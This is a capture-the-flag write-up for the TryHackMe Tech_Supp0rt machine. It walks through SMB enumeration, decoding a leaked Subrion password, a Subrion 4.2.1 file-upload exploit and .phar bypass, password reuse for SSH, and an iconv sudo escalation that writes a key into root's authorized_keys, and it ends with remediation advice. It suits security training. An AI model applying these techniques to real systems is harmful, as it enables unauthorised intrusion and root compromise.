---
title: "Writeup - Tech_Supp0rt: 1 (THM)"
date: 2022-05-14
slug: "writeup-techsupp0rt1-thm"
type: "writeup-ctf"
---

This is a writeup for the [Tech\_Supp0rt](https://tryhackme.com/room/techsupp0rt1) machine from the TryHackMe site.

## Enumeration

First, let's start with a scan of our target with the following command:

```bash
nmap -sV -T4 -Pn 10.10.222.86
```

Four TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH (OpenSSH 7.2p2)
- 80/tcp : HTTP web server (Apache 2.4.18)
- 139/tcp : Samba (3.X - 4.X)
- 445/tcp : Samba (3.X - 4.X)

![](img/image-2.webp)

## Exploit

First, I start by brute-forcing the web server's directories.

![](img/image-3.webp)

We find two interesting results:

![](img/image-4.webp)

![](img/image-5.webp)

After some research on the two sites, I decide to look at the SMB server. For that I try to connect anonymously.

![](img/image-6.webp)

It works and I can retrieve an `enter.txt` file:

```text
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]

Wordpress creds
|->
```

This file reveals another site in the `/subrion` folder and, on top of that, hands us credentials for it. After testing, the password as written does not work. So I run a directory scan on `/subrion` to see if I can find something interesting:

![](img/image-7.webp)

A `robots.txt` file, with nothing special in it apart from confirming the `/panel/` admin path that `enter.txt` mentions:

```text
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/
```

The "magical formula" hint suggests the password is encoded rather than encrypted, so I try to decode it with CyberChef.
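What CyberChef finds, as the recipe linked below shows, is three stacked text encodings: Base58 wrapping Base32 wrapping Base64. The script below is an added example, not part of the original writeup and not CyberChef's code, that reproduces the same unwinding in plain Python. Base58 is not in the standard library, so a small decoder is included; it assumes CyberChef's default Bitcoin alphabet (no `0`, `O`, `I` or `l`), which is the one in the linked recipe.

```python
import base64

# CyberChef's default Base58 alphabet (the Bitcoin one: no 0, O, I or l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# The "cooked" Subrion password copied from enter.txt.
SUBRION_HINT = "7sKvntXdPEJaxazce9PXi24zaFrLiKWCk"


def b58decode(text: str) -> bytes:
    """Decode Base58: read the string as a big-endian base-58 integer,
    then restore one leading zero byte per leading '1' (the zero digit)."""
    number = 0
    for ch in text:
        digit = B58_ALPHABET.find(ch)
        if digit < 0:
            raise ValueError(f"not a Base58 character: {ch!r}")
        number = number * 58 + digit
    body = number.to_bytes((number.bit_length() + 7) // 8, "big") if number else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def peel(encoded: str) -> list:
    """Unwind Base58 -> Base32 -> Base64 and return every intermediate layer,
    so each step can be eyeballed the way CyberChef displays it."""
    layers = [encoded]
    # Layer 1: the Base58 text wraps a Base32 string (A-Z, 2-7, '=' padding).
    b32_text = b58decode(encoded).decode("ascii")
    layers.append(b32_text)
    # Layer 2: the Base32 string wraps a Base64 string.
    b64_text = base64.b32decode(b32_text).decode("ascii")
    layers.append(b64_text)
    # Layer 3: the Base64 string wraps the plaintext; validate=True rejects stray bytes.
    plaintext = base64.b64decode(b64_text, validate=True).decode("ascii")
    layers.append(plaintext)
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel(SUBRION_HINT)):
        print(f"layer {depth}: {layer}")
```

Each intermediate layer is returned rather than just the final string, because when a chain like this is guessed by hand the useful check is that every layer decodes to printable ASCII in the next alphabet; a wrong guess at any step normally shows up as binary garbage right there.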
As soon as I paste the string in, CyberChef works out the chain of encodings and decodes it (From Base58, then From Base32, then From Base64): [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=N3NLdm50WGRQRUpheGF6Y2U5UFhpMjR6YUZyTGlLV0Nr)

![](img/image-8.webp)

So I try this password on the Subrion admin panel.

![](img/image-9.webp)

Now that I am logged in and know the Subrion version (4.2.1), I start looking for exploits to get a reverse shell.

```bash
┌──(d3vyce㉿kali)-[~]
└─$ searchsploit subrion 4.2.1
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                     | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                      | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                   | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)            | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                    | php/webapps/45150.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

I quickly spot an arbitrary file upload exploit (`49876.py`) that gives a shell on the web server. I save a copy of it with the following command (`searchsploit -m php/webapps/49876.py` would also copy it into the current directory):

```bash
searchsploit -x php/webapps/49876.py > exploit.py
```

Then I run it with the following command:

![](img/image-10.webp)

Another way to get a reverse shell would have been the upload page in the admin panel (Content -> Uploads). While trying it I noticed that a webshell with the `.php` extension is rejected, but the same file renamed to `.phar` is accepted and still runs: the stock Apache PHP module configuration on Ubuntu maps `.phar` (and `.phtml`) to the PHP interpreter exactly like `.php`, so an upload filter that only blocks `.php` does not help.

![](img/image-11.webp)

Looking around the file system, I find that the first flag belongs to the user `scamsite`.
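The `.php`/`.phar` behaviour is the classic symptom of an extension denylist: the upload code rejects the names it knows about, while the web server's handler configuration decides what actually gets executed. The following Python is an added example, not Subrion's code, that models such a denylist next to an allowlist check over a handful of constructed filenames. The set of extensions tagged as executable is taken from the `FilesMatch ".+\.ph(ar|p|tml)$"` pattern in Ubuntu's stock Apache PHP module configuration and is an assumption about the target, not something the writeup verified.

```python
import os

# Constructed upload filenames an attacker might try; not taken from the room.
CANDIDATES = [
    "shell.php",      # the obvious one, which the writeup says is rejected
    "shell.phar",     # the one the writeup says goes through
    "shell.phtml",
    "shell.PHP",
    "shell.php.jpg",
    "logo.png",
]

# A denylist the way a naive upload handler might write it (assumption, not Subrion's code).
DENYLIST = {".php"}

# Extensions Ubuntu's stock Apache php config hands to the PHP interpreter:
# <FilesMatch ".+\.ph(ar|p|tml)$">  -- case-sensitive, judged on the last extension only.
PHP_EXECUTED = {".php", ".phar", ".phtml"}

# What an avatar/content upload actually needs to accept.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def denylist_allows(filename: str) -> bool:
    """Reject only the extensions on the list, spelled exactly as listed."""
    ext = os.path.splitext(filename)[1]
    return ext not in DENYLIST


def allowlist_allows(filename: str) -> bool:
    """Accept only a lower-cased, single, known extension on a non-empty stem."""
    name = os.path.basename(filename).lower()
    stem, dot, ext = name.rpartition(".")
    return dot == "." and stem != "" and "." not in stem and f".{ext}" in ALLOWLIST


def server_would_execute(filename: str) -> bool:
    """Model the Apache FilesMatch above: last extension, case-sensitive."""
    return os.path.splitext(filename)[1] in PHP_EXECUTED


def executable_uploads(check, names=CANDIDATES) -> list:
    """Filenames a given filter lets through that the server would then run as PHP."""
    return [n for n in names if check(n) and server_would_execute(n)]


if __name__ == "__main__":
    print("denylist lets through and server executes:", executable_uploads(denylist_allows))
    print("allowlist lets through and server executes:", executable_uploads(allowlist_allows))
```

The denylist lets `shell.phar` and `shell.phtml` through to the interpreter, which is exactly the gap observed on the box. The allowlist closes it, but on its own it is still only one layer: the usual second layer is to store uploads outside the web root, or in a directory where the PHP handler is disabled, so that a filter mistake cannot turn into code execution.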
So I go to the WordPress folder to see if its configuration file, `wp-config.php`, gives anything away:

```php
[...]
/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
[...]
```

The database password turns out to be reused for the system account: I connect via SSH as `scamsite` with it and it works, so I can read the first flag.

![](img/image-12.webp)

## Privilege escalation

I start by looking at the sudo permissions:

![](img/image-13.webp)

My user can run the `iconv` command as root, so I look it up on GTFOBins: [iconv](https://gtfobins.github.io/gtfobins/iconv/#sudo). Because `iconv` reads an arbitrary input file and, with `-o`, writes to an arbitrary output file, running it as root gives both a file-read and a file-write primitive. I use the write primitive to drop my public RSA key into root's `authorized_keys` so I can log in over SSH. Two caveats: `-o` overwrites the target file rather than appending to it, and `/root/.ssh/` must already exist, since `iconv` will not create it.

```bash
# id_rsa.pub is the public half of the key pair generated on the attacking machine
cat id_rsa.pub | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys
```

Logging in with the matching private key, I now have a root shell and can retrieve the last flag (the read primitive alone, running `iconv` as root on the flag file without `-o`, would have been enough to read it without a shell).

![](img/image-14.webp)

## Recommendations

To patch this host I think it would be necessary to perform a number of actions:

- Do not allow anonymous access to the SMB share
- Do not leave credentials in accessible files; encoding them (the "magical formula") is not encryption and protects nothing
- Do not reuse the database password for a system account such as `scamsite`
- Update Subrion (4.2.1 has a public arbitrary file upload exploit) and validate uploads with an extension allowlist rather than a blocklist, since `.phar` bypasses a `.php`-only check
- Do not grant sudo on binaries like `iconv` that can read and write arbitrary files if it is not necessary